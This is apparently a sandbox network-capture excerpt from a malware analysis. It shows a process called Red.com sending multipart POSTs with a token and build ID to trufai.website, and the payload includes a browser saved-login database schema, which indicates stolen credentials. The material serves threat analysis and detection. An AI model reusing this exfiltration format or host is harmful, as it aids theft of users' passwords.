2025-01-03 13:30:47 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 03 Jan 2025 13:30:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-01-03 13:30:47 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49770	116.203.13.109	443	7592	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com

Timestamp	Bytes transferred	Direction	Data
2025-01-03 13:30:47 UTC	282	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----268qq9hvsjecba1v379h User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: trufai.website Content-Length: 213453 Connection: Keep-Alive Cache-Control: no-cache
2025-01-03 13:30:47 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 32 36 38 71 71 39 68 76 73 6a 65 63 62 61 31 76 33 37 39 68 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 61 31 37 64 62 33 38 31 61 34 33 65 65 33 65 34 61 33 35 37 63 34 35 63 37 64 32 35 36 38 61 0d 0a 2d 2d 2d 2d 2d 2d 32 36 38 71 71 39 68 76 73 6a 65 63 62 61 31 76 33 37 39 68 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 32 36 38 71 71 39 68 76 73 6a 65 63 62 61 31 76 33 37 39 68 0d 0a 43 6f 6e 74 Data Ascii: ------268qq9hvsjecba1v379hContent-Disposition: form-data; name="token"5a17db381a43ee3e4a357c45c7d2568a------268qq9hvsjecba1v379hContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------268qq9hvsjecba1v379hCont
2025-01-03 13:30:47 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-03 13:30:47 UTC	16355	OUT	Data Raw: 41 59 69 43 78 45 41 41 51 59 42 44 51 51 49 41 77 67 49 44 51 67 49 43 41 67 4a 43 41 41 76 5a 58 64 45 74 42 69 33 43 71 41 41 41 41 59 34 6f 47 49 66 43 68 45 41 41 51 59 42 44 51 51 49 43 41 67 49 44 51 67 49 43 41 67 4a 42 77 41 76 5a 58 64 45 74 42 69 33 43 59 41 41 41 41 59 66 43 52 45 41 41 51 59 42 44 51 51 49 43 41 67 49 44 51 67 49 43 41 67 4a 42 67 41 76 5a 58 64 45 74 42 69 33 43 49 41 41 41 41 59 65 43 42 45 41 41 51 59 49 44 51 51 49 43 41 67 49 44 51 67 49 43 41 67 4a 42 51 41 76 5a 58 64 45 74 42 69 33 45 41 41 41 42 69 49 48 45 51 41 42 42 67 45 4e 42 41 67 44 43 41 67 4e 43 41 67 49 43 41 6b 45 41 43 39 6c 5a 51 58 79 48 55 51 47 6f 41 41 41 42 67 50 73 35 42 38 47 45 51 41 42 42 67 45 4e 42 41 67 49 43 41 67 4e 43 41 67 49 43 41 6b 44 Data Ascii: AYiCxEAAQYBDQQIAwgIDQgICAgJCAAvZXdEtBi3CqAAAAY4oGIfChEAAQYBDQQICAgIDQgICAgJBwAvZXdEtBi3CYAAAAYfCREAAQYBDQQICAgIDQgICAgJBgAvZXdEtBi3CIAAAAYeCBEAAQYIDQQICAgIDQgICAgJBQAvZXdEtBi3EAAABiIHEQABBgENBAgDCAgNCAgICAkEAC9lZQXyHUQGoAAABgPs5B8GEQABBgENBAgICAgNCAgICAkD
2025-01-03 13:30:47 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-03 13:30:47 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-03 13:30:47 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-03 13:30:47 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-03 13:30:47 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-03 13:30:47 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-03 13:30:47 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-03 13:30:49 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 03 Jan 2025 13:30:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49771	116.203.13.109	443	7592	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com

Timestamp	Bytes transferred	Direction	Data
2025-01-03 13:30:48 UTC	281	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----7q16x4790zmgv3wbimoz User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: trufai.website Content-Length: 55081 Connection: Keep-Alive Cache-Control: no-cache
2025-01-03 13:30:48 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 37 71 31 36 78 34 37 39 30 7a 6d 67 76 33 77 62 69 6d 6f 7a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 61 31 37 64 62 33 38 31 61 34 33 65 65 33 65 34 61 33 35 37 63 34 35 63 37 64 32 35 36 38 61 0d 0a 2d 2d 2d 2d 2d 2d 37 71 31 36 78 34 37 39 30 7a 6d 67 76 33 77 62 69 6d 6f 7a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 37 71 31 36 78 34 37 39 30 7a 6d 67 76 33 77 62 69 6d 6f 7a 0d 0a 43 6f 6e 74 Data Ascii: ------7q16x4790zmgv3wbimozContent-Disposition: form-data; name="token"5a17db381a43ee3e4a357c45c7d2568a------7q16x4790zmgv3wbimozContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------7q16x4790zmgv3wbimozCont
2025-01-03 13:30:48 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-03 13:30:48 UTC	16355	OUT	Data Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 42 2f 67 41 4c 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpB/gALQAAAAAAAAAAAAAAAAAAAAAA
2025-01-03 13:30:48 UTC	6016	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-03 13:30:49 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 03 Jan 2025 13:30:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-01-03 13:30:49 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49773	116.203.13.109	443	7592	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com

Timestamp	Bytes transferred	Direction	Data
2025-01-03 13:30:50 UTC	282	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----qq16fukf3wbsrqq1nycj User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: trufai.website Content-Length: 142457 Connection: Keep-Alive Cache-Control: no-cache
2025-01-03 13:30:50 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 71 71 31 36 66 75 6b 66 33 77 62 73 72 71 71 31 6e 79 63 6a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 61 31 37 64 62 33 38 31 61 34 33 65 65 33 65 34 61 33 35 37 63 34 35 63 37 64 32 35 36 38 61 0d 0a 2d 2d 2d 2d 2d 2d 71 71 31 36 66 75 6b 66 33 77 62 73 72 71 71 31 6e 79 63 6a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 71 71 31 36 66 75 6b 66 33 77 62 73 72 71 71 31 6e 79 63 6a 0d 0a 43 6f 6e 74 Data Ascii: ------qq16fukf3wbsrqq1nycjContent-Disposition: form-data; name="token"5a17db381a43ee3e4a357c45c7d2568a------qq16fukf3wbsrqq1nycjContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------qq16fukf3wbsrqq1nycjCont
2025-01-03 13:30:50 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-03 13:30:50 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
